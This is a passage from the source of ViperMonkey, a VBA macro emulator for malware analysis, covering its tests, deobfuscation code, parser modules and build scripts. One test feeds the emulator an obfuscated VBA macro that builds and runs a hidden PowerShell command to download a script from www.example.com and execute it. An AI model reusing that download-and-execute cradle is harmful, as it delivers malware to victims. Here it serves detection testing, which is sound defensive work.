vipermonkey.Module(vba_code) 146 | # NOTE: The function should be replaced after the context is evaluated by the module. Otherwise the module will replace our function. 147 | module.eval(context) 148 | 149 | context.globals['Base64Decode'] = replaced_base64 150 | 151 | document_open = context['Document_Open'] 152 | document_open.load_context(context) 153 | assert 'result' in context 154 | assert context['result'] == 'hello world!' 155 | 156 | 157 | def test_reporting_actions(): 158 | vba_code = dedent(r''' 159 | Public Function Execute() As Variant 160 | 161 | Dim m1, m2, m3, m4 As String 162 | 163 | m1 = "p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & " " & "-" & "w" & " " & "h" & "i" & "d" & "d" & "e" 164 | m2 = "n" & " -" & "e" & "x" & "e" & "c" & " b" & "y" & "p" & "a" & "s" & "s " & "-" & "c " & Chr(34) 165 | m3 = "$a" & "=" & "Invoke" & "-" & "We" & "bRequest" & " ww" & "w.example.com" & "/" & "scr" & "ipt.txt" 166 | m4 = "; " & "Inv" & "ok" & "e-Expr" & "ession " & "$" & "a" & Chr(34) & "" 167 | 168 | Shell m1 & m2 & m3 & m4, vbHide 169 | 170 | WinExec "wscript powershell.exe -x run.ps1", 0 171 | 172 | End Function 173 | 174 | Execute 175 | ''') 176 | 177 | context = vipermonkey.Context() 178 | vipermonkey.eval(vba_code, context=context) 179 | 180 | print dict(context.actions) 181 | 182 | assert dict(context.actions) == { 183 | 'Shell function': [ 184 | ('Execute Command', 'powershell -w hidden -exec bypass -c ' 185 | '"$a=Invoke-WebRequest www.example.com/script.txt; Invoke-Expression $a"')], 186 | 'Interesting Function Call': [('WinExec', ['wscript powershell.exe -x run.ps1', 0])], 187 | 'Interesting Command Execution': [('Run', 'wscript powershell.exe -x run.ps1')], 188 | } 189 | 190 | 191 | 192 | -------------------------------------------------------------------------------- /tests/test_bugs.py: -------------------------------------------------------------------------------- 1 | """Tests our bug fixes and tweaks to ensure future development doesn't mess anything up.""" 2 | 3 | import pytest 4 | 5 | from vipermonkey.core import * 6 | import vipermonkey.core.literals 7 | 8 | 9 | def test_call_vs_member_access(): 10 | """ 11 | A "Call_Statement" should have a higher priority over a "MemberAccessExpression" 12 | """ 13 | parsed = member_access_expression.parseString('Fileout.Close')[0] 14 | assert type(parsed) == MemberAccessExpression 15 | assert parsed.lhs == 'Fileout' 16 | assert parsed.rhs == ['Close'] 17 | 18 | parsed = simple_statement.parseString('Fileout.Close')[0] 19 | assert type(parsed) == Call_Statement 20 | assert type(parsed.name) == MemberAccessExpression 21 | assert str(parsed.name) == 'Fileout.Close' 22 | assert len(parsed.params) == 0 23 | 24 | parsed = simple_statement.parseString('Fileout.Write final')[0] 25 | assert type(parsed) == Call_Statement 26 | assert type(parsed.name) == MemberAccessExpression 27 | assert str(parsed.name) == "Fileout.Write('final')" 28 | assert len(parsed.name.rhs) == 1 29 | assert type(parsed.name.rhs[0]) == Function_Call 30 | assert str(parsed.name.rhs[0]) == "Write('final')" 31 | assert len(parsed.name.rhs[0].params) == 1 32 | assert type(parsed.name.rhs[0].params[0]) == SimpleNameExpression 33 | assert str(parsed.name.rhs[0].params[0]) == 'final' 34 | 35 | parsed = simple_statement.parseString('doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "test"')[0] 36 | assert type(parsed) == Call_Statement 37 | assert type(parsed.name) == MemberAccessExpression 38 | assert str(parsed.name) == "doc.VBProject.VBComponents('ThisDocument').CodeModule.AddFromString('test')" 39 | assert parsed.name.lhs == 'doc' 40 | assert map(str, parsed.name.rhs) == ['VBProject', "VBComponents('ThisDocument')", 'CodeModule', "AddFromString('test')"] 41 | assert type(parsed.name.rhs[1]) == Function_Call 42 | assert parsed.name.rhs[1].name == 'VBComponents' 43 | # Params is a pyparsing.ParseResult, so use list() to cast as a list. 44 | vb_comp_params = list(parsed.name.rhs[1].params) 45 | assert len(vb_comp_params) == 1 46 | assert type(vb_comp_params[0]) == vipermonkey.core.literals.String 47 | assert str(vb_comp_params[0]) == 'ThisDocument' 48 | add_string_params = list(parsed.name.rhs[-1].params) 49 | assert len(add_string_params) == 1 50 | assert type(add_string_params[0]) == vipermonkey.core.literals.String 51 | assert str(add_string_params[0]) == 'test' 52 | 53 | parsed = simple_statement.parseString(r'fso.CreateTextFile("h" & "e" & "l" & "l" & "o", True, True)')[0] 54 | assert type(parsed) == Call_Statement 55 | assert type(parsed.name) == MemberAccessExpression 56 | assert str(parsed.name) == "fso.CreateTextFile('(h & e & l & l & o), True, True')" 57 | assert parsed.name.rhs[0].params[0].eval(Context()) == 'hello' 58 | 59 | # Preliminary tests to prevent recursive loop. 60 | parsed = expression.parseString('fso.CreateTextFile()')[0] 61 | assert type(parsed) == MemberAccessExpression 62 | assert parsed.lhs == 'fso' 63 | assert type(parsed.rhs[0]) == Function_Call 64 | 65 | # FIXME: I had to disable the Exponential operator in expression and the prop_assign_statement in simple_statement 66 | # to fix a recursion error that was happening with the following line. 67 | # Ensure this doesn't mess up MemberAccessExpression being used in other places 68 | try: 69 | parsed = simple_statement.parseString(r'Set Fileout2 = fso.CreateTextFile("h" & "e" & "l" & "l" & "o", True, True)')[0] 70 | except RuntimeError as e: 71 | pytest.fail(e.message) 72 | assert type(parsed) == Let_Statement 73 | assert parsed.name == 'Fileout2' 74 | assert type(parsed.expression) == MemberAccessExpression 75 | assert str(parsed.expression) == "fso.CreateTextFile('(h & e & l & l & o), True, True')" 76 | assert parsed.expression.lhs == 'fso' 77 | assert len(parsed.expression.rhs) == 1 78 | assert type(parsed.expression.rhs[0]) == Function_Call 79 | assert parsed.expression.rhs[0].name == 'CreateTextFile' 80 | assert parsed.expression.rhs[0].params[0].eval(Context()) == 'hello' 81 | 82 | 83 | def test_recursion_errors(): 84 | """Tests that we have fixed the recursion errors.""" 85 | # NOTE: Catching these exceptions help to speed up failures if they are going to occur. 86 | 87 | try: 88 | simple_statement.parseString(r'Set Fileout2 = fso.CreateTextFile("h" & "e" & "l" & "l" & "o", True, True)') 89 | except RuntimeError as e: 90 | pytest.fail(str(e)) 91 | 92 | try: 93 | parsed = expr_list.parseString('a, b, c, d, e, f') 94 | except RuntimeError as e: 95 | pytest.fail(str(e)) 96 | assert len(parsed) == 6 97 | assert str(parsed) == '[a, b, c, d, e, f]' 98 | 99 | try: 100 | simple_statement.parseString(r'Set Fileout = fso.CreateTextFile(url, True, True)') 101 | except RuntimeError as e: 102 | pytest.fail(str(e)) 103 | 104 | -------------------------------------------------------------------------------- /tests/test_deobfuscation.py: -------------------------------------------------------------------------------- 1 | """Tests deobfuscation utility.""" 2 | 3 | from __future__ import print_function 4 | 5 | from textwrap import dedent 6 | 7 | from vipermonkey.core import deobfuscation 8 | 9 | 10 | def test_regex(): 11 | """Tests the regular expressions used.""" 12 | # Chr/String concatination run. 13 | match = deobfuscation.CONCAT_RUN.match('Chr(71 Xor 18) & "2" & Chr(82 Xor 4) + "0" & Chr(70 Xor 15) & Chr(84 Xor 19) & "9"') 14 | print(match.capturesdict()) 15 | assert match.captures('entry') == [ 16 | 'Chr(71 Xor 18)', '"2"', 'Chr(82 Xor 4)', '"0"', 'Chr(70 Xor 15)', 'Chr(84 Xor 19)', '"9"'] 17 | 18 | # Setting variable run. 19 | match = deobfuscation.VAR_RUN.match(dedent('''\ 20 | ZOOP = Chr(123 Xor 11) 21 | ZOOP = ZOOP & Chr(122 Xor 14) 22 | ZOOP = ZOOP & Chr(109 Xor 4) 23 | ZOOP = ZOOP & Chr(99 Xor 13) 24 | ZOOP = ZOOP & Chr(97 Xor 6) 25 | ZOOP = ZOOP & Chr(34 Xor 12) 26 | ZOOP = ZOOP & Chr(67 Xor 5) 27 | ZOOP = ZOOP & Chr(109 Xor 4) 28 | ZOOP = ZOOP & Chr(109 Xor 1) + Chr(69) + Chr(81 Xor 2) 29 | ZOOP = ZOOP & Chr(107 Xor 18) 30 | ''')) 31 | print(match.capturesdict()) 32 | assert match.group('var') == 'ZOOP' 33 | assert match.captures('entry') == [ 34 | 'Chr(123 Xor 11)', 'Chr(122 Xor 14)', 'Chr(109 Xor 4)', 'Chr(99 Xor 13)', 'Chr(97 Xor 6)', 35 | 'Chr(34 Xor 12)', 'Chr(67 Xor 5)', 'Chr(109 Xor 4)', 'Chr(109 Xor 1) + Chr(69) + Chr(81 Xor 2)', 36 | 'Chr(107 Xor 18)'] 37 | 38 | match = deobfuscation.VAR_RUN.match(dedent('''\ 39 | ZAP = "" 40 | ZAP = ZAP & Chr(80 Xor 19) 41 | ZAP = ZAP & ":" 42 | ZAP = ZAP & "\\" 43 | ZAP = ZAP & Chr(71 Xor 18) 44 | ''')) 45 | print(match.capturesdict()) 46 | assert match.group('var') == 'ZAP' 47 | assert match.captures('entry') == ['""', 'Chr(80 Xor 19)', '":"', '"\\"', 'Chr(71 Xor 18)'] 48 | 49 | 50 | def test_replace_concat_run(): 51 | vba_code = dedent('''\ 52 | ZOOP = Chr(123 Xor 11) & Chr(122 Xor 14) & Chr(109 Xor 4) & Chr(99 Xor 13) 53 | ZOOP = ZOOP & Chr(97 Xor 6) & Chr(34 Xor 12) & Chr(67 Xor 5) & Chr(109 Xor 4) 54 | ZOOP = ZOOP & Chr(109 Xor 1) + Chr(69) + Chr(81 Xor 2) 55 | ZOOP = ZOOP & Chr(107 Xor 18) 56 | ''') 57 | assert deobfuscation._replace_concat_runs(vba_code) == dedent('''\ 58 | ZOOP = "ptin" 59 | ZOOP = ZOOP & "g.Fi" 60 | ZOOP = ZOOP & "lES" 61 | ZOOP = ZOOP & "y" 62 | ''') 63 | 64 | 65 | def test_replace_var_run(): 66 | vba_code = dedent('''\ 67 | ZOOP = Chr(123 Xor 11) 68 | ZOOP = ZOOP & Chr(122 Xor 14) 69 | ZOOP = ZOOP & Chr(109 Xor 4) 70 | ZOOP = ZOOP & Chr(99 Xor 13) 71 | ZOOP = ZOOP & Chr(97 Xor 6) 72 | ZOOP = ZOOP & Chr(34 Xor 12) 73 | ZOOP = ZOOP & Chr(67 Xor 5) 74 | ZOOP = ZOOP & Chr(109 Xor 4) 75 | ZOOP = ZOOP & Chr(109 Xor 1) + Chr(69) + Chr(81 Xor 2) 76 | ZOOP = ZOOP & Chr(107 Xor 18) 77 | ''') 78 | print(repr(deobfuscation._replace_var_runs(vba_code))) 79 | assert deobfuscation._replace_var_runs(vba_code) == ( 80 | 'ZOOP = Chr(123 Xor 11) & Chr(122 Xor 14) & Chr(109 Xor 4) & ' 81 | 'Chr(99 Xor 13) & Chr(97 Xor 6) & Chr(34 Xor 12) & Chr(67 Xor 5) & Chr(109 Xor 4) ' 82 | '& Chr(109 Xor 1) + Chr(69) + Chr(81 Xor 2) & Chr(107 Xor 18)\n') 83 | 84 | 85 | def test_deobfucation(): 86 | vba_code = dedent('''\ 87 | ZOOP = Chr(123 Xor 11) 88 | ZOOP = ZOOP & Chr(122 Xor 14) 89 | ZOOP = ZOOP & Chr(109 Xor 4) 90 | ZOOP = ZOOP & Chr(99 Xor 13) 91 | ZOOP = ZOOP & Chr(97 Xor 6) & Chr(34 Xor 12) & Chr(67 Xor 5) & Chr(109 Xor 4) 92 | ZOOP = ZOOP & Chr(109 Xor 1) + Chr(69) + Chr(81 Xor 2) 93 | ZOOP = ZOOP & Chr(107 Xor 18) 94 | ''') 95 | assert deobfuscation.deobfuscate(vba_code) == dedent('''\ 96 | ZOOP = "pting.FilESy" 97 | ''') 98 | 99 | vba_code = dedent('''\ 100 | ZAP = "" 101 | ZAP = ZAP & Chr(80 Xor 19) 102 | ZAP = ZAP & ":" 103 | ZAP = ZAP & "\\" 104 | ZAP = ZAP & Chr(71 Xor 18) 105 | ''') 106 | assert deobfuscation.deobfuscate(vba_code) == dedent('''\ 107 | ZAP = "C:\\U" 108 | ''') -------------------------------------------------------------------------------- /tests/test_expressions.py: -------------------------------------------------------------------------------- 1 | """ 2 | Tests the grammars and logic in expressions.py 3 | """ 4 | 5 | from textwrap import dedent 6 | 7 | import vipermonkey 8 | from vipermonkey.core import * 9 | import vipermonkey.core.literals 10 | 11 | 12 | def test_paragraphs(): 13 | """Tests references to the .Paragraphs field of the current doc.""" 14 | context = vipermonkey.Context() 15 | context['ActiveDocument.Paragraphs'] = 'PARAGRAPH OBJECT' 16 | 17 | assert vipermonkey.eval('ActiveDocument.Paragraphs', context) == 'PARAGRAPH OBJECT' 18 | 19 | parsed = simple_statement.parseString('ActiveDocument.Paragraphs')[0] 20 | assert type(parsed) == Call_Statement 21 | assert type(parsed.name) == MemberAccessExpression 22 | assert parsed.eval(context) == 'PARAGRAPH OBJECT' 23 | 24 | # Having "ActiveDocument" is not required. 25 | parsed = simple_statement.parseString('something_else.Paragraphs')[0] 26 | assert type(parsed) == Call_Statement 27 | assert type(parsed.name) == MemberAccessExpression 28 | assert parsed.eval(context) == 'PARAGRAPH OBJECT' 29 | 30 | # Doesn't work if not last entry. 31 | parsed = simple_statement.parseString('ActiveDocument.Paragraphs.Count')[0] 32 | assert type(parsed) == Call_Statement 33 | assert type(parsed.name) == MemberAccessExpression 34 | assert parsed.name.eval(context) == 'ActiveDocument.Paragraphs.Count' 35 | 36 | parsed = simple_statement.parseString('r = ActiveDocument.Paragraphs')[0] 37 | assert type(parsed) == Let_Statement 38 | assert type(parsed.expression) == MemberAccessExpression 39 | assert parsed.expression.eval(context) == 'PARAGRAPH OBJECT' 40 | 41 | 42 | def test_oslanguage(): 43 | """Tests references to the OSlanguage field.""" 44 | context = vipermonkey.Context() 45 | context['oslanguage'] = 'Spanish' 46 | assert vipermonkey.eval('OS.OSLanguage', context) == 'Spanish' 47 | 48 | 49 | def test_application_run(): 50 | """Tests functions called with Application.Run()""" 51 | context = vipermonkey.Context() 52 | vipermonkey.eval('Application.Run(WinExec, "powershell.exe test.ps1")', context) 53 | 54 | assert context.actions == { 55 | # FIXME: Application.Run from VBALibraryFuncs doesn't get called for some reason. 56 | # 'Interesting Function Call': [('Run', 'WinExec')], 57 | 'Interesting Command Execution': [('Run', 'powershell.exe test.ps1')] 58 | } 59 | 60 | 61 | def test_clipboard(): 62 | """Tests calls to setData() and getData() clipboard.""" 63 | context = vipermonkey.Context() 64 | 65 | assert '** CLIPBOARD **' not in context 66 | assert vipermonkey.eval('objHTML.ParentWindow.clipboardData.getData()', context) is None 67 | assert vipermonkey.eval('objHTML.ParentWindow.clipboardData.setData(None, "test data")', context) is True 68 | assert '** CLIPBOARD **' in context.globals 69 | assert context['** CLIPBOARD **'] == 'test data' 70 | assert vipermonkey.eval('objHTML.ParentWindow.clipboardData.getData()', context) == 'test data' 71 | 72 | 73 | def test_doc_vars(): 74 | """Tests calls to retrieve document properties.""" 75 | context = vipermonkey.Context() 76 | context.doc_vars['subject'] = 'test Subject' 77 | 78 | assert vipermonkey.eval('ActiveDocument.BuiltInDocumentProperties("Subject")', context) == 'test Subject' 79 | assert vipermonkey.eval('ActiveDocument.variables("subject")', context) == 'test Subject' 80 | 81 | # TODO: Add test for _handle_docvar_value() 82 | 83 | 84 | def test_text_file_read(tmpdir): 85 | """Tests OpenTextFile(...).ReadAll() calls.""" 86 | test_file = tmpdir / 'test.txt' 87 | test_file.write('this is test data') 88 | 89 | assert vipermonkey.eval('fs.OpenTextFile("{!s}").ReadAll()'.format(test_file)) == 'this is test data' 90 | 91 | # It should also work when the drive is uppercase. 92 | # (see note in _handle_text_file_read()) 93 | test_file = str(test_file) 94 | if test_file.startswith('c:'): 95 | test_file = 'C:' + test_file[2:] 96 | assert vipermonkey.eval('fs.OpenTextFile("{!s}").ReadAll()'.format(test_file)) == 'this is test data' 97 | 98 | 99 | def test_file_close(): 100 | """Tests close of file object foo.Close()""" 101 | context = vipermonkey.Context() 102 | context.open_file('test.txt') 103 | context.write_file('test.txt', b'data') 104 | 105 | assert not context.closed_files 106 | # vipermonkey closes the last open file 107 | vipermonkey.eval('foo.Close()', context) 108 | assert context.closed_files == {'test.txt': b'data'} 109 | 110 | 111 | def test_replace(): 112 | """Tests string replaces of the form foo.Replace(bar, baz)""" 113 | 114 | assert vipermonkey.eval('foo.Replace("replace foo with bar", "foo", "bar")') == 'replace bar with bar' 115 | 116 | # TODO: Add test for RegExp object. 117 | # context = vipermonkey.Context() 118 | # context['RegExp.Pattern'] = '[a-z]*!' 119 | # 120 | # assert vipermonkey.eval('RegExp.Replace("hello world!", "mars!")') == 'hello mars!' 121 | 122 | 123 | def test_add(): 124 | """Tests Add() function""" 125 | context = vipermonkey.Context() 126 | context['my_dict'] = {'a': 1, 'b': 2} 127 | 128 | vipermonkey.eval('my_dict.Add("c", 3)', context) 129 | assert context['my_dict'] == {'a': 1, 'b': 2, 'c': 3} 130 | 131 | 132 | def test_adodb_writes(): 133 | """Tests expression like "foo.Write(...)" where foo = "ADODB.Stream" """ 134 | context = vipermonkey.Context() 135 | vipermonkey.eval('CreateObject("ADODB.Stream").Write("this is test data")', context) 136 | assert context.open_files == {'ADODB.Stream': 'this is test data'} 137 | 138 | # FIXME: This method fails. 139 | # context = vipermonkey.Context() 140 | # vipermonkey.eval(dedent(r''' 141 | # foo = CreateObject("ADODB.Stream") 142 | # foo.Write("this is test data") 143 | # '''), context) 144 | # assert context.open_files == {'ADODB.Stream': 'this is test data'} 145 | 146 | 147 | def test_loadxml(): 148 | # TODO 149 | pass 150 | -------------------------------------------------------------------------------- /vipermonkey/.prospector.yaml: -------------------------------------------------------------------------------- 1 | strictness: medium 2 | test-warnings: true 3 | doc-warnings: false 4 | 5 | pep8: 6 | disable: 7 | - W602 8 | - W605 9 | - W603 10 | - E129 11 | enable: 12 | - W601 13 | options: 14 | max-line-length: 140 15 | 16 | pylint: 17 | disable: 18 | - wrong-import-position 19 | - logging-not-lazy 20 | - len-as-condition 21 | options: 22 | max-nested-blocks: 7 23 | max-branches: 60 24 | max-locals: 30 25 | max-statements: 150 26 | max-args: 10 27 | 28 | mccabe: 29 | run: true 30 | options: 31 | max-complexity: 60 32 | 33 | vulture: 34 | run: false 35 | -------------------------------------------------------------------------------- /vipermonkey/__init__.py: -------------------------------------------------------------------------------- 1 | """Exposes interface for ViperMonkey""" 2 | 3 | from vipermonkey.api import * 4 | from vipermonkey.core.deobfuscation import deobfuscate 5 | -------------------------------------------------------------------------------- /vipermonkey/core/.prospector.yaml: -------------------------------------------------------------------------------- 1 | strictness: medium 2 | test-warnings: true 3 | doc-warnings: false 4 | 5 | pep8: 6 | disable: 7 | - W602 8 | - W605 9 | - W603 10 | - E129 11 | enable: 12 | - W601 13 | options: 14 | max-line-length: 140 15 | 16 | pylint: 17 | disable: 18 | - wrong-import-position 19 | - logging-not-lazy 20 | - len-as-condition 21 | options: 22 | max-nested-blocks: 7 23 | max-branches: 60 24 | max-locals: 30 25 | max-statements: 150 26 | max-args: 10 27 | 28 | mccabe: 29 | run: true 30 | options: 31 | max-complexity: 60 32 | 33 | vulture: 34 | run: false 35 | -------------------------------------------------------------------------------- /vipermonkey/core/antlr_vba/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/decalage2/ViperMonkey/73547cef7f82dbcb10e22e36b84b558a07f7d21d/vipermonkey/core/antlr_vba/__init__.py -------------------------------------------------------------------------------- /vipermonkey/core/antlr_vba/antlr4.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | set classpath0=%CLASSPATH% 3 | SET CLASSPATH=.;C:\Javalib\antlr-4.6-complete.jar;%CLASSPATH% 4 | java org.antlr.v4.Tool %* 5 | set classpath=%classpath0% 6 | set classpath0= -------------------------------------------------------------------------------- /vipermonkey/core/antlr_vba/grun.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | set classpath0=%CLASSPATH% 3 | SET CLASSPATH=.;C:\Javalib\antlr-4.6-complete.jar;%CLASSPATH% 4 | java org.antlr.v4.gui.TestRig %* 5 | set classpath=%classpath0% 6 | set classpath0= 7 | -------------------------------------------------------------------------------- /vipermonkey/core/antlr_vba/makevba.bat: -------------------------------------------------------------------------------- 1 | antlr4 -Dlanguage=Python2 -encoding utf8 vba.g4 -------------------------------------------------------------------------------- /vipermonkey/core/antlr_vba/testvba.py: -------------------------------------------------------------------------------- 1 | import antlr4 2 | import sys 3 | 4 | from vbaLexer import vbaLexer 5 | from vbaListener import vbaListener 6 | from vbaParser import vbaParser 7 | 8 | class MyListener(vbaListener): 9 | def __init__(self): 10 | pass 11 | 12 | def enterSubStmt(self, ctx): 13 | for child in ctx.children: 14 | # Skip all children that aren't AmbiguousIdentifier 15 | if isinstance(child, vbaParser.AmbiguousIdentifierContext): 16 | # if type(child).__name__ != 'AmbiguousIdentifierContext': 17 | name = child.getText() 18 | print('Sub %r' % name) 19 | # self.that.globals[name.lower()] = ctx 20 | 21 | def exitSubStmt(self, ctx): 22 | print('exitSubStmt') 23 | 24 | def enterFunctionStmt(self, ctx): 25 | for child in ctx.children: 26 | # Skip all children that aren't AmbiguousIdentifier 27 | if type(child).__name__ != 'AmbiguousIdentifierContext': 28 | continue 29 | name = child.getText() 30 | print('Function %r' % name) 31 | # self.that.globals[name.lower()] = ctx 32 | 33 | def enterBlockStmt(self, ctx): 34 | print('enterBlockStmt:') 35 | print(ctx.getText()) 36 | 37 | def enterLiteral(self, ctx): 38 | print('enterLiteral:') 39 | print(ctx.getText()) 40 | 41 | 42 | try: 43 | filename = sys.argv[1] 44 | except: 45 | sys.exit('Usage: %s ' % sys.argv[0]) 46 | 47 | print('Parsing %s' % filename) 48 | print('Lexer') 49 | lexer = vbaLexer(antlr4.FileStream(sys.argv[1])) 50 | print('Stream') 51 | stream = antlr4.CommonTokenStream(lexer) 52 | print('vbaParser') 53 | parser = vbaParser(stream) 54 | print('Parsing from startRule') 55 | tree = parser.startRule() 56 | print('Walking the parse tree') 57 | listener = MyListener() 58 | walker = antlr4.ParseTreeWalker() 59 | walker.walk(listener, tree) 60 | -------------------------------------------------------------------------------- /vipermonkey/core/comments_eol.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """@package comments_eol 4 | Parsing of VB comments and end of line markers. 5 | """ 6 | 7 | import logging 8 | from pyparsing import Literal, SkipTo, Combine, Suppress, Optional, CaselessKeyword, OneOrMore 9 | from vba_lines import line_terminator 10 | from logger import log 11 | if (log.getEffectiveLevel() == logging.DEBUG ): 12 | log.debug('importing comments_eol') 13 | 14 | """ 15 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 16 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 17 | 18 | Author: Philippe Lagadec - http://www.decalage.info 19 | License: BSD, see source code or documentation 20 | 21 | Project Repository: 22 | https://github.com/decalage2/ViperMonkey 23 | """ 24 | 25 | # === LICENSE ================================================================== 26 | 27 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 28 | # All rights reserved. 29 | # 30 | # Redistribution and use in source and binary forms, with or without modification, 31 | # are permitted provided that the following conditions are met: 32 | # 33 | # * Redistributions of source code must retain the above copyright notice, this 34 | # list of conditions and the following disclaimer. 35 | # * Redistributions in binary form must reproduce the above copyright notice, 36 | # this list of conditions and the following disclaimer in the documentation 37 | # and/or other materials provided with the distribution. 38 | # 39 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 40 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 41 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 42 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 43 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 44 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 45 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 46 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 47 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 48 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 49 | 50 | 51 | # ------------------------------------------------------------------------------ 52 | # CHANGELOG: 53 | # 2015-02-12 v0.01 PL: - first prototype 54 | # 2015-2016 PL: - many updates 55 | # 2016-06-11 v0.02 PL: - split vipermonkey into several modules 56 | 57 | __version__ = '0.02' 58 | 59 | # ------------------------------------------------------------------------------ 60 | # TODO: 61 | 62 | # --- COMMENT ---------------------------------------------------------------- 63 | 64 | # 3.3.1 Separator and Special Tokens 65 | # single-quote = %x0027 ; ' 66 | # comment-body = *(line-continuation / non-line-termination-character) LINE-END 67 | single_quote = Literal("'") 68 | comment_body = SkipTo(line_terminator) # + line_terminator 69 | # NOTE: the comment body should NOT include the line terminator 70 | 71 | # single quote comment 72 | comment_single_quote = Combine(single_quote + comment_body) 73 | 74 | # 5.4.1.2 Rem Statement 75 | # rem-statement = "Rem" comment-body 76 | rem_statement = Suppress(Combine(CaselessKeyword('Rem') + comment_body)) 77 | 78 | # --- SEPARATOR AND SPECIAL TOKENS --------------------------------------- 79 | 80 | # 3.3.1 Separator and Special Tokens 81 | # WS = 1*(WSC / line-continuation) 82 | # special-token = "," / "." / "!" / "#" / "&" / "(" / ")" / "*" / "+" / "-" / "/" / ":" / ";" 83 | # / "<" / "=" / ">" / "?" / "\" / "^" 84 | # NO-WS = 85 | # NO-LINE-CONTINUATION = 86 | # EOL = [WS] LINE-END / single-quote comment-body 87 | # EOS = *(EOL / ":") ;End Of Statement 88 | 89 | # End Of Line, INCLUDING line terminator 90 | EOL = Optional(comment_single_quote) + line_terminator 91 | 92 | # End Of Statement, INCLUDING line terminator 93 | EOS = Suppress(Optional(";")) + OneOrMore(EOL | Literal(':')) 94 | -------------------------------------------------------------------------------- /vipermonkey/core/curses_ascii.py: -------------------------------------------------------------------------------- 1 | """@package curses_ascii 2 | Various utility functions for working with characters. 3 | """ 4 | 5 | # Code borrowed from the Python standard library curses/ascii because it cannot 6 | # be imported on Windows: 7 | def _ctoi(c): 8 | if type(c) == type(""): 9 | return ord(c) 10 | else: 11 | return c 12 | 13 | def isalnum(c): return isalpha(c) or isdigit(c) 14 | def isalpha(c): return isupper(c) or islower(c) 15 | def isascii(c): return 0 <= _ctoi(c) <= 127 # ? 16 | def isblank(c): return _ctoi(c) in (9, 32) 17 | def iscntrl(c): return 0 <= _ctoi(c) <= 31 or _ctoi(c) == 127 18 | def isdigit(c): return 48 <= _ctoi(c) <= 57 19 | def isgraph(c): return 33 <= _ctoi(c) <= 126 20 | def islower(c): return 97 <= _ctoi(c) <= 122 21 | def isprint(c): return 32 <= _ctoi(c) <= 126 22 | def ispunct(c): return isgraph(c) and not isalnum(c) 23 | def isspace(c): return _ctoi(c) in (9, 10, 11, 12, 13, 32) 24 | def isupper(c): return 65 <= _ctoi(c) <= 90 25 | def isxdigit(c): return isdigit(c) or \ 26 | (65 <= _ctoi(c) <= 70) or (97 <= _ctoi(c) <= 102) 27 | def isctrl(c): return 0 <= _ctoi(c) < 32 28 | def ismeta(c): return _ctoi(c) > 127 29 | 30 | -------------------------------------------------------------------------------- /vipermonkey/core/deobfuscation.py: -------------------------------------------------------------------------------- 1 | """@package deobfuscation 2 | 3 | Utility to help deobfuscate some VBA code before it gets processed. 4 | This can also be used by the user to help clean up code for analysis. 5 | 6 | WARNING: The regex below are used to find and replace common VBA obfuscated code 7 | with something similar. It makes no attempt at creating a complete/correct grammar. 8 | That is what vipermonkey is for. 9 | 10 | Author: Philippe Lagadec - http://www.decalage.info 11 | License: BSD, see source code or documentation 12 | 13 | Project Repository: 14 | https://github.com/decalage2/ViperMonkey 15 | """ 16 | 17 | from functools import reduce 18 | 19 | # attempt to import regex if it's installed, otherwise it will be ignored 20 | # (this is because regex does not work on PyPy2 on Windows) 21 | try: 22 | import regex 23 | REGEX = True 24 | except ImportError: 25 | # TODO: it would be good to log a warning 26 | REGEX = False 27 | 28 | from operator import xor 29 | 30 | from vipermonkey.core.vba_lines import vba_collapse_long_lines 31 | from vipermonkey.core.logger import log 32 | 33 | # === LICENSE ================================================================== 34 | 35 | # ViperMonkey is copyright (c) 2015-2021 Philippe Lagadec (http://www.decalage.info) 36 | # All rights reserved. 37 | # 38 | # Redistribution and use in source and binary forms, with or without modification, 39 | # are permitted provided that the following conditions are met: 40 | # 41 | # * Redistributions of source code must retain the above copyright notice, this 42 | # list of conditions and the following disclaimer. 43 | # * Redistributions in binary form must reproduce the above copyright notice, 44 | # this list of conditions and the following disclaimer in the documentation 45 | # and/or other materials provided with the distribution. 46 | # 47 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 48 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 49 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 50 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 51 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 52 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 53 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 54 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 55 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 56 | # OF THIS SOFTWARE, EVEN 